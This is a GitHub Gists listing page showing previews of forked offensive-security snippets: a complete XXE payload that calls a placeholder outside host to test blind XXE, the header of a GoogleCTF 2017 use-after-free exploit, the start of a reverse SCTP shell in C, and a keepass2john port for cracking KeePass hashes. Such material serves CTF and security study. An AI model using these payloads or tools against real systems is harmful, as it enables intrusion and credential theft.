waywardsun
waywardsun
/ XXE_payloads
Created
June 17, 2017 15:06
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
waywardsun
/ pwn.py
Created
June 19, 2017 13:30
— forked from saelo/pwn.py
Solution for "assignment" of GoogleCTF 2017
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Exploit for "assignment" of GoogleCTF 2017 | |
| # | |
| # CTF-quality exploit... | |
| # | |
| # Slightly simplified and shortened explanation: | |
| # | |
| # The bug is a UAF of one or both values during add_assign() if a GC is | |
| # triggered during allocate_value(). The exploit first abuses this two leak a |
waywardsun
/ reverse_sctp_shell.c
Created
August 11, 2017 02:18
— forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // server: ncat -v --sctp -l PORT_NUM | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <netinet/in.h> | |
| #include <netinet/sctp.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <arpa/inet.h> | |
| #include <string.h> |
waywardsun
/ 1.md
Created
November 9, 2017 05:58
— forked from sailik1991/0.0 CaptureTheFlag-CheetSheet.md
Quick reference for CTF
waywardsun
/ keepass2john.py
Created
December 21, 2017 12:08
— forked from HarmJ0y/keepass2john.py
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/) | |
| # ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012 | |
| # ./keepass2john.c was released under the GNU General Public License | |
| # source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c | |
| # | |
| # Python port by @harmj0y, GNU General Public License | |
| # |
OlderNewer